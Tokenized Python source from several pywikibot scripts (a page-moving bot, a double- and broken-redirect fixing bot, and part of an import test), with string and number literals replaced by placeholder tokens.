treat ( page ) <EOL> elif choice == '<STR_LIT:n>' : <EOL> pass <EOL> elif choice == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> else : <EOL> self . treat ( page ) <EOL> def run ( self ) : <EOL> self . appendAll = False <EOL> self . regexAll = False <EOL> self . noNamespace = False <EOL> for page in self . generator : <EOL> self . treat ( page ) <EOL> def main ( ) : <EOL> gen = None <EOL> prefix = None <EOL> oldName = None <EOL> newName = None <EOL> noredirect = False <EOL> always = False <EOL> skipredirects = False <EOL> summary = None <EOL> fromToPairs = [ ] <EOL> genFactory = pagegenerators . GeneratorFactory ( ) <EOL> for arg in pywikibot . handleArgs ( ) : <EOL> if arg . startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == len ( '<STR_LIT>' ) : <EOL> filename = pywikibot . input ( <EOL> u'<STR_LIT>' ) <EOL> else : <EOL> filename = arg [ len ( '<STR_LIT>' ) : ] <EOL> oldName1 = None <EOL> for page in pagegenerators . TextfilePageGenerator ( filename ) : <EOL> if oldName1 : <EOL> fromToPairs . append ( [ oldName1 , page . title ( ) ] ) <EOL> oldName1 = None <EOL> else : <EOL> oldName1 = page . title ( ) <EOL> if oldName1 : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' % filename ) <EOL> elif arg == '<STR_LIT>' : <EOL> noredirect = True <EOL> elif arg == '<STR_LIT>' : <EOL> always = True <EOL> elif arg == '<STR_LIT>' : <EOL> skipredirects = True <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if oldName : <EOL> pywikibot . warning ( u'<STR_LIT>' % oldName ) <EOL> oldName = arg [ len ( '<STR_LIT>' ) : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if oldName : <EOL> fromToPairs . append ( [ oldName , arg [ len ( '<STR_LIT>' ) : ] ] ) <EOL> oldName = None <EOL> else : <EOL> pywikibot . warning ( u'<STR_LIT>' % arg ) <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == len ( '<STR_LIT>' ) : <EOL> prefix = pywikibot . input ( u'<STR_LIT>' ) <EOL> else : <EOL> prefix = arg [ <NUM_LIT:8> : ] <EOL> elif arg . 
startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == len ( '<STR_LIT>' ) : <EOL> summary = pywikibot . input ( u'<STR_LIT>' ) <EOL> else : <EOL> summary = arg [ <NUM_LIT:9> : ] <EOL> else : <EOL> genFactory . handleArg ( arg ) <EOL> if oldName : <EOL> pywikibot . warning ( u'<STR_LIT>' % oldName ) <EOL> for pair in fromToPairs : <EOL> page = pywikibot . Page ( pywikibot . getSite ( ) , pair [ <NUM_LIT:0> ] ) <EOL> bot = MovePagesBot ( None , prefix , noredirect , always , skipredirects , <EOL> summary ) <EOL> bot . moveOne ( page , pair [ <NUM_LIT:1> ] ) <EOL> if not gen : <EOL> gen = genFactory . getCombinedGenerator ( ) <EOL> if gen : <EOL> preloadingGen = pagegenerators . PreloadingGenerator ( gen ) <EOL> bot = MovePagesBot ( preloadingGen , prefix , noredirect , always , <EOL> skipredirects , summary ) <EOL> bot . run ( ) <EOL> elif not fromToPairs : <EOL> pywikibot . showHelp ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import re <EOL> import datetime <EOL> import wikipedia as pywikibot <EOL> from pywikibot import i18n <EOL> import config <EOL> import query <EOL> import xmlreader <EOL> SPECIALPAGE_REGEX = '<STR_LIT>' <EOL> class RedirectGenerator : <EOL> def __init__ ( self , xmlFilename = None , namespaces = [ ] , offset = - <NUM_LIT:1> , <EOL> use_move_log = False , use_api = False , start = None , until = None , <EOL> number = None ) : <EOL> self . site = pywikibot . getSite ( ) <EOL> self . xmlFilename = xmlFilename <EOL> self . namespaces = namespaces <EOL> if use_api and not self . namespaces : <EOL> self . namespaces = [ <NUM_LIT:0> ] <EOL> self . offset = offset <EOL> self . use_move_log = use_move_log <EOL> self . use_api = use_api <EOL> self . api_start = start <EOL> self . api_until = until <EOL> self . api_number = number <EOL> if self . api_number is None : <EOL> if self . site . versionnumber ( ) < <NUM_LIT:16> or use_move_log : <EOL> self . api_number = config . special_page_limit <EOL> else : <EOL> self . api_number = '<STR_LIT>' <EOL> def get_redirects_from_dump ( self , alsoGetPageTitles = False ) : <EOL> '''<STR_LIT>''' <EOL> xmlFilename = self . xmlFilename <EOL> redict = { } <EOL> dump = xmlreader . XmlDump ( xmlFilename ) <EOL> redirR = self . site . redirectRegex ( ) <EOL> readPagesCount = <NUM_LIT:0> <EOL> if alsoGetPageTitles : <EOL> pageTitles = set ( ) <EOL> for entry in dump . parse ( ) : <EOL> readPagesCount += <NUM_LIT:1> <EOL> if readPagesCount % <NUM_LIT> == <NUM_LIT:0> : <EOL> pywikibot . output ( u'<STR_LIT>' % readPagesCount ) <EOL> if len ( self . namespaces ) > <NUM_LIT:0> : <EOL> if pywikibot . Page ( self . site , entry . title ) . namespace ( ) not in self . namespaces : <EOL> continue <EOL> if alsoGetPageTitles : <EOL> pageTitles . add ( entry . title . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) ) <EOL> m = redirR . match ( entry . text ) <EOL> if m : <EOL> target = m . 
group ( <NUM_LIT:1> ) <EOL> for code in self . site . family . iwkeys : <EOL> if target . startswith ( '<STR_LIT>' % code ) or target . startswith ( '<STR_LIT>' % code ) : <EOL> if code == self . site . language ( ) : <EOL> target = target [ ( len ( code ) + <NUM_LIT:1> ) : ] <EOL> if target . startswith ( '<STR_LIT::>' ) : <EOL> target = target [ <NUM_LIT:1> : ] <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % ( entry . title , code ) ) <EOL> target = None <EOL> break <EOL> if target : <EOL> source = entry . title . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> target = target . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> target = target . strip ( '<STR_LIT:_>' ) <EOL> if not pywikibot . getSite ( ) . nocapitalize : <EOL> source = source [ : <NUM_LIT:1> ] . upper ( ) + source [ <NUM_LIT:1> : ] <EOL> target = target [ : <NUM_LIT:1> ] . upper ( ) + target [ <NUM_LIT:1> : ] <EOL> if '<STR_LIT:#>' in target : <EOL> target = target [ : target . index ( '<STR_LIT:#>' ) ] . rstrip ( "<STR_LIT:_>" ) <EOL> if '<STR_LIT:|>' in target : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % entry . title ) <EOL> target = target [ : target . index ( '<STR_LIT:|>' ) ] . rstrip ( "<STR_LIT:_>" ) <EOL> if target : <EOL> redict [ source ] = target <EOL> if alsoGetPageTitles : <EOL> return redict , pageTitles <EOL> else : <EOL> return redict <EOL> def get_redirect_pageids_via_api ( self ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:list>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . api_number , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> for ns in self . namespaces : <EOL> params [ '<STR_LIT>' ] = ns <EOL> if self . api_start : <EOL> params [ '<STR_LIT>' ] = self . api_start <EOL> done = False <EOL> while not done : <EOL> pywikibot . output ( u'<STR_LIT>' , newline = False ) <EOL> data = query . GetData ( params , self . 
site ) <EOL> if '<STR_LIT:error>' in data : <EOL> raise RuntimeError ( "<STR_LIT>" % data [ '<STR_LIT:error>' ] ) <EOL> if "<STR_LIT>" in data : <EOL> params [ '<STR_LIT>' ] = int ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> for x in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> done = self . api_until and x [ '<STR_LIT:title>' ] >= self . api_until <EOL> if done : <EOL> return <EOL> yield x [ '<STR_LIT>' ] <EOL> if not done and '<STR_LIT>' in data : <EOL> params . update ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> break <EOL> def _next_redirect_group ( self ) : <EOL> """<STR_LIT>""" <EOL> apiQ = [ ] <EOL> for pageid in self . get_redirect_pageids_via_api ( ) : <EOL> apiQ . append ( pageid ) <EOL> if len ( apiQ ) >= <NUM_LIT> : <EOL> yield apiQ <EOL> apiQ = [ ] <EOL> if apiQ : <EOL> yield apiQ <EOL> def get_redirects_via_api ( self , maxlen = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } <EOL> for apiQ in self . _next_redirect_group ( ) : <EOL> params [ '<STR_LIT>' ] = apiQ <EOL> pywikibot . output ( u'<STR_LIT:.>' , newline = False ) <EOL> data = query . GetData ( params , self . site ) <EOL> if '<STR_LIT:error>' in data : <EOL> raise RuntimeError ( "<STR_LIT>" % data ) <EOL> if data == [ ] or '<STR_LIT>' not in data : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> redirects = { } <EOL> pages = { } <EOL> redirects = dict ( ( x [ '<STR_LIT>' ] , x [ '<STR_LIT:to>' ] ) <EOL> for x in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> for pagetitle in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] . 
values ( ) : <EOL> if '<STR_LIT>' in pagetitle and '<STR_LIT>' not in pagetitle : <EOL> pages [ pagetitle [ '<STR_LIT:title>' ] ] = False <EOL> else : <EOL> pages [ pagetitle [ '<STR_LIT:title>' ] ] = True <EOL> for redirect in redirects : <EOL> target = redirects [ redirect ] <EOL> result = <NUM_LIT:0> <EOL> final = None <EOL> try : <EOL> if pages [ target ] : <EOL> final = target <EOL> try : <EOL> while result <= maxlen : <EOL> result += <NUM_LIT:1> <EOL> final = redirects [ final ] <EOL> except KeyError : <EOL> pass <EOL> except KeyError : <EOL> result = None <EOL> pass <EOL> yield ( redirect , result , target , final ) <EOL> def retrieve_broken_redirects ( self ) : <EOL> if self . use_api : <EOL> count = <NUM_LIT:0> <EOL> for ( pagetitle , type , target , final ) in self . get_redirects_via_api ( maxlen = <NUM_LIT:2> ) : <EOL> if type == <NUM_LIT:0> : <EOL> yield pagetitle <EOL> if self . api_number : <EOL> count += <NUM_LIT:1> <EOL> if count >= self . api_number : <EOL> break <EOL> elif not self . xmlFilename : <EOL> path = self . site . broken_redirects_address ( default_limit = False ) <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> maintenance_txt = self . site . getUrl ( path ) <EOL> Rredir = re . compile ( SPECIALPAGE_REGEX ) <EOL> redir_names = Rredir . findall ( maintenance_txt ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % len ( redir_names ) ) <EOL> for redir_name in redir_names : <EOL> yield redir_name <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' ) <EOL> redirs , pageTitles = self . get_redirects_from_dump ( <EOL> alsoGetPageTitles = True ) <EOL> for ( key , value ) in redirs . iteritems ( ) : <EOL> if value not in pageTitles : <EOL> yield key <EOL> def retrieve_double_redirects ( self ) : <EOL> if self . use_move_log : <EOL> if self . site . has_api ( ) : <EOL> gen = self . get_moved_pages_redirects ( ) <EOL> else : <EOL> gen = self . get_moved_pages_redirects_old ( ) <EOL> for redir_page in gen : <EOL> yield redir_page . 
title ( ) <EOL> elif self . use_api and self . site . has_api ( ) : <EOL> count = <NUM_LIT:0> <EOL> for ( pagetitle , type , target , final ) in self . get_redirects_via_api ( maxlen = <NUM_LIT:2> ) : <EOL> if type != <NUM_LIT:0> and type != <NUM_LIT:1> : <EOL> yield pagetitle <EOL> if self . api_number : <EOL> count += <NUM_LIT:1> <EOL> if count >= self . api_number : <EOL> break <EOL> elif self . xmlFilename : <EOL> redict = self . get_redirects_from_dump ( ) <EOL> num = <NUM_LIT:0> <EOL> for ( key , value ) in redict . iteritems ( ) : <EOL> num += <NUM_LIT:1> <EOL> if num > self . offset and value in redict : <EOL> yield key <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( num + <NUM_LIT:1> , len ( redict ) ) ) <EOL> else : <EOL> path = self . site . double_redirects_address ( default_limit = False ) <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> maintenance_txt = self . site . getUrl ( path ) <EOL> Rredir = re . compile ( SPECIALPAGE_REGEX ) <EOL> redir_names = Rredir . findall ( maintenance_txt ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % len ( redir_names ) ) <EOL> for redir_name in redir_names : <EOL> yield redir_name <EOL> def get_moved_pages_redirects ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . offset <= <NUM_LIT:0> : <EOL> self . offset = <NUM_LIT:1> <EOL> start = ( datetime . datetime . utcnow ( ) - <EOL> datetime . timedelta ( <NUM_LIT:0> , self . offset * <NUM_LIT> ) ) <EOL> offset_time = start . strftime ( "<STR_LIT>" ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % str ( self . api_number ) ) <EOL> move_gen = self . site . logpages ( mode = "<STR_LIT>" , start = offset_time , <EOL> number = self . api_number ) <EOL> if pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % offset_time ) <EOL> for logentry in move_gen : <EOL> moved_page = logentry [ <NUM_LIT:0> ] <EOL> try : <EOL> if not moved_page . isRedirectPage ( ) : <EOL> continue <EOL> except pywikibot . BadTitle : <EOL> continue <EOL> except pywikibot . 
ServerError : <EOL> continue <EOL> try : <EOL> for page in moved_page . getReferences ( follow_redirects = True , <EOL> redirectsOnly = True ) : <EOL> yield page <EOL> except pywikibot . NoPage : <EOL> continue <EOL> def get_moved_pages_redirects_old ( self ) : <EOL> move_regex = re . compile ( <EOL> r'<STR_LIT>' ) <EOL> if self . offset <= <NUM_LIT:0> : <EOL> self . offset = <NUM_LIT:1> <EOL> offsetpattern = re . compile ( <EOL> r"""<STR_LIT>""" <EOL> r"""<STR_LIT>""" <EOL> r"""<STR_LIT>""" ) <EOL> start = datetime . datetime . utcnow ( ) - datetime . timedelta ( <NUM_LIT:0> , self . offset * <NUM_LIT> ) <EOL> offset_time = start . strftime ( "<STR_LIT>" ) <EOL> while True : <EOL> move_url = ( <EOL> "<STR_LIT>" % { '<STR_LIT:path>' : self . site . path ( ) , '<STR_LIT>' : offset_time } ) <EOL> try : <EOL> move_list = self . site . getUrl ( move_url ) <EOL> if pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % offset_time ) <EOL> except : <EOL> import traceback <EOL> pywikibot . output ( unicode ( traceback . format_exc ( ) ) ) <EOL> return <EOL> g = move_regex . findall ( move_list ) <EOL> if pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % len ( g ) ) <EOL> for moved_title in g : <EOL> moved_page = pywikibot . Page ( self . site , moved_title ) <EOL> try : <EOL> if not moved_page . isRedirectPage ( ) : <EOL> continue <EOL> except pywikibot . BadTitle : <EOL> continue <EOL> except pywikibot . ServerError : <EOL> continue <EOL> try : <EOL> for page in moved_page . getReferences ( follow_redirects = True , <EOL> redirectsOnly = True ) : <EOL> yield page <EOL> except pywikibot . NoPage : <EOL> continue <EOL> m = offsetpattern . search ( move_list ) <EOL> if not m : <EOL> break <EOL> offset_time = m . group ( <NUM_LIT:1> ) <EOL> class RedirectRobot : <EOL> def __init__ ( self , action , generator , always = False , number = None ) : <EOL> self . site = pywikibot . getSite ( ) <EOL> self . action = action <EOL> self . 
generator = generator <EOL> self . always = always <EOL> self . number = number <EOL> self . exiting = False <EOL> def prompt ( self , question ) : <EOL> if not self . always : <EOL> choice = pywikibot . inputChoice ( question , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:y>' , '<STR_LIT:N>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] , '<STR_LIT:N>' ) <EOL> if choice == '<STR_LIT:n>' : <EOL> return False <EOL> elif choice == '<STR_LIT:q>' : <EOL> self . exiting = True <EOL> return False <EOL> elif choice == '<STR_LIT:a>' : <EOL> self . always = True <EOL> return True <EOL> def delete_broken_redirects ( self ) : <EOL> reason = i18n . twtranslate ( self . site , '<STR_LIT>' ) <EOL> for redir_name in self . generator . retrieve_broken_redirects ( ) : <EOL> self . delete_1_broken_redirect ( redir_name , reason ) <EOL> if self . exiting : <EOL> break <EOL> def delete_1_broken_redirect ( self , redir_name , reason ) : <EOL> redir_page = pywikibot . Page ( self . site , redir_name ) <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % redir_page . title ( ) ) <EOL> try : <EOL> targetPage = redir_page . getRedirectTarget ( ) <EOL> except pywikibot . IsNotRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % redir_page . title ( ) ) <EOL> except pywikibot . NoPage : <EOL> pywikibot . output ( u'<STR_LIT>' % redir_page . title ( ) ) <EOL> else : <EOL> try : <EOL> targetPage . get ( ) <EOL> except pywikibot . NoPage : <EOL> if self . prompt ( u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> % ( targetPage . title ( asLink = True ) , <EOL> redir_page . title ( asLink = True ) ) ) : <EOL> try : <EOL> redir_page . delete ( reason , prompt = False ) <EOL> except pywikibot . NoUsername : <EOL> if ( ( i18n . twhas_key ( <EOL> targetPage . site . lang , <EOL> '<STR_LIT>' ) and <EOL> i18n . twhas_key ( targetPage . site . lang , <EOL> '<STR_LIT>' ) ) or targetPage . site . lang == '<STR_LIT:->' ) : <EOL> pywikibot . 
output ( u"<STR_LIT>" <EOL> u"<STR_LIT>" ) <EOL> content = redir_page . get ( get_redirect = True ) <EOL> content = i18n . twtranslate ( <EOL> targetPage . site . lang , <EOL> '<STR_LIT>' <EOL> ) + "<STR_LIT:\n>" + content <EOL> redir_page . put ( content , reason ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> % targetPage . title ( asLink = True ) ) <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> def fix_double_redirects ( self ) : <EOL> for redir_name in self . generator . retrieve_double_redirects ( ) : <EOL> self . fix_1_double_redirect ( redir_name ) <EOL> if self . exiting : <EOL> break <EOL> def fix_1_double_redirect ( self , redir_name ) : <EOL> redir = pywikibot . Page ( self . site , redir_name ) <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % redir . title ( ) ) <EOL> newRedir = redir <EOL> redirList = [ ] <EOL> while True : <EOL> redirList . append ( u'<STR_LIT>' % ( newRedir . site . lang , <EOL> newRedir . sectionFreeTitle ( ) ) ) <EOL> try : <EOL> targetPage = newRedir . getRedirectTarget ( ) <EOL> except pywikibot . IsNotRedirectPage : <EOL> if len ( redirList ) == <NUM_LIT:1> : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % redir . title ( asLink = True ) ) <EOL> break <EOL> elif len ( redirList ) == <NUM_LIT:2> : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % newRedir . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> pass <EOL> except pywikibot . SectionError : <EOL> pywikibot . warning ( <EOL> u"<STR_LIT>" <EOL> % newRedir . title ( asLink = True ) ) <EOL> except pywikibot . BadTitle as e : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' <EOL> % str ( e ) [ <NUM_LIT:10> : ] ) <EOL> except pywikibot . InvalidTitle , err : <EOL> pywikibot . warning ( u'<STR_LIT:%s>' % err ) <EOL> break <EOL> except pywikibot . 
NoPage : <EOL> if len ( redirList ) == <NUM_LIT:1> : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % redir . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> if self . always : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % newRedir . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> pywikibot . warning ( <EOL> u"<STR_LIT>" <EOL> % newRedir . title ( asLink = True ) ) <EOL> except pywikibot . ServerError : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) <EOL> break <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> if targetPage . site != self . site : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> if self . always : <EOL> break <EOL> try : <EOL> mw_msg = targetPage . site . mediawiki_message ( <EOL> '<STR_LIT>' ) <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> if targetPage . title ( ) == mw_msg : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" ) <EOL> break <EOL> if redirList . count ( u'<STR_LIT>' <EOL> % ( targetPage . site . lang , <EOL> targetPage . sectionFreeTitle ( ) ) ) : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> if targetPage . isStaticRedirect ( ) : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" ) <EOL> pass <EOL> else : <EOL> newRedir = targetPage <EOL> continue <EOL> try : <EOL> oldText = redir . get ( get_redirect = True ) <EOL> except pywikibot . BadTitle : <EOL> pywikibot . output ( u"<STR_LIT>" ) <EOL> break <EOL> text = self . site . redirectRegex ( ) . sub ( <EOL> '<STR_LIT>' % ( self . site . redirect ( ) , <EOL> targetPage . title ( asLink = True , textlink = True ) ) , <EOL> oldText ) <EOL> if redir . title ( ) == targetPage . title ( ) or text == oldText : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % redir . title ( asLink = True ) ) <EOL> break <EOL> summary = i18n . twtranslate ( self . 
site , '<STR_LIT>' , <EOL> { '<STR_LIT:to>' : targetPage . title ( asLink = True ) } <EOL> ) <EOL> pywikibot . showDiff ( oldText , text ) <EOL> if self . prompt ( u'<STR_LIT>' ) : <EOL> try : <EOL> redir . put ( text , summary ) <EOL> except pywikibot . LockedPage : <EOL> pywikibot . output ( u'<STR_LIT>' % redir . title ( ) ) <EOL> except pywikibot . SpamfilterError as error : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % ( redir . title ( ) , error . url ) ) <EOL> except pywikibot . PageNotSaved as error : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % ( redir . title ( ) , error ) ) <EOL> except pywikibot . NoUsername : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % redir . title ( ) ) <EOL> except pywikibot . Error as error : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % ( redir . title ( ) , error ) ) <EOL> break <EOL> def fix_double_or_delete_broken_redirects ( self ) : <EOL> delete_reason = i18n . twtranslate ( self . site , '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for ( redir_name , code , target , final ) in self . generator . get_redirects_via_api ( maxlen = <NUM_LIT:2> ) : <EOL> if code == <NUM_LIT:1> : <EOL> continue <EOL> elif code == <NUM_LIT:0> : <EOL> self . delete_1_broken_redirect ( redir_name , delete_reason ) <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> self . fix_1_double_redirect ( redir_name ) <EOL> count += <NUM_LIT:1> <EOL> if self . exiting or ( self . number and count >= self . number ) : <EOL> break <EOL> def run ( self ) : <EOL> if self . action == '<STR_LIT>' : <EOL> self . fix_double_redirects ( ) <EOL> elif self . action == '<STR_LIT>' : <EOL> self . delete_broken_redirects ( ) <EOL> elif self . action == '<STR_LIT>' : <EOL> self . 
fix_double_or_delete_broken_redirects ( ) <EOL> def main ( * args ) : <EOL> action = None <EOL> xmlFilename = None <EOL> namespaces = [ ] <EOL> offset = - <NUM_LIT:1> <EOL> moved_pages = False <EOL> fullscan = False <EOL> start = '<STR_LIT>' <EOL> until = '<STR_LIT>' <EOL> number = None <EOL> always = False <EOL> for arg in pywikibot . handleArgs ( * args ) : <EOL> if arg == '<STR_LIT>' or arg == '<STR_LIT>' : <EOL> action = '<STR_LIT>' <EOL> elif arg == '<STR_LIT>' or arg == '<STR_LIT>' : <EOL> action = '<STR_LIT>' <EOL> elif arg == '<STR_LIT>' : <EOL> action = '<STR_LIT>' <EOL> elif arg == '<STR_LIT>' : <EOL> fullscan = True <EOL> elif arg == '<STR_LIT>' : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) <EOL> fullscan = True <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == <NUM_LIT:4> : <EOL> xmlFilename = i18n . input ( '<STR_LIT>' ) <EOL> else : <EOL> xmlFilename = arg [ <NUM_LIT:5> : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> moved_pages = True <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> ns = arg [ <NUM_LIT:11> : ] <EOL> if ns == '<STR_LIT>' : <EOL> ns = i18n . input ( '<STR_LIT>' ) <EOL> if ns == '<STR_LIT>' : <EOL> ns = '<STR_LIT:0>' <EOL> try : <EOL> ns = int ( ns ) <EOL> except ValueError : <EOL> pass <EOL> if ns not in namespaces : <EOL> namespaces . append ( ns ) <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> offset = int ( arg [ <NUM_LIT:8> : ] ) <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> start = arg [ <NUM_LIT:7> : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> until = arg [ <NUM_LIT:7> : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> number = int ( arg [ <NUM_LIT:7> : ] ) <EOL> elif arg == '<STR_LIT>' : <EOL> always = True <EOL> else : <EOL> pywikibot . output ( u'<STR_LIT>' % arg ) <EOL> if ( <EOL> not action or <EOL> xmlFilename and moved_pages or <EOL> fullscan and xmlFilename <EOL> ) : <EOL> pywikibot . 
showHelp ( ) <EOL> else : <EOL> gen = RedirectGenerator ( xmlFilename , namespaces , offset , moved_pages , <EOL> fullscan , start , until , number ) <EOL> bot = RedirectRobot ( action , gen , always , number ) <EOL> bot . run ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import unittest <EOL> import test_pywiki <EOL> import sys , os <EOL> scriptdir = os . path . dirname ( sys . argv [ <NUM_LIT:0> ] ) <EOL> if not os . path . isabs ( scriptdir ) : <EOL> scriptdir = os . path . abspath ( os . path . join ( os . curdir , scriptdir ) ) <EOL> os . chdir ( os . path . join ( scriptdir , '<STR_LIT:..>' ) ) <EOL> class PyWikiExternalImporterTestCase ( test_pywiki . PyWikiTestCase ) : <EOL> def test_spelling ( self ) : <EOL> self . assertTrue ( os . path . exists ( os . path . join ( scriptdir , '<STR_LIT>' ) ) ) <EOL> def test_i18n ( self ) : <EOL> import i18n <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_crontab ( self ) : <EOL> import crontab <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_odf ( self ) : <EOL> import odf <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_openpyxl ( self ) : <EOL> import openpyxl <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_dtbext_compiled ( self ) : <EOL> return <EOL> target = os . path . join ( scriptdir , '<STR_LIT>' ) <EOL> sys . path . append ( target ) <EOL> import jseg <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> self . assertTrue ( os . path . exists ( os . path . join ( scriptdir , '<STR_LIT>' ) ) ) <EOL> self . assertTrue ( os . path . exists ( os . path . join ( scriptdir , '<STR_LIT>' ) ) ) <EOL> import opencv <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import pycolorname <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> try : <EOL> import pydmtx <EOL> except : <EOL> import _pydmtx as pydmtx <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> from colormath . color_objects import RGBColor <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> from py_w3c . validators . html . validator import HTMLValidator , ValidationFault <EOL> self . assertTrue ( "<STR_LIT>" in sys . 
modules ) <EOL> try : <EOL> import zbar <EOL> except : <EOL> import _zbar as zbar <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> sys . path . remove ( target ) <EOL> def test_dtbext_packaged ( self ) : <EOL> return <EOL> import numpy <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import scipy <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import cv <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> import cv2 <EOL> sys . path . remove ( '<STR_LIT>' ) <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import pyexiv2 <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import warnings <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> import gtk <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import rsvg <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import cairo <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import magic <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules 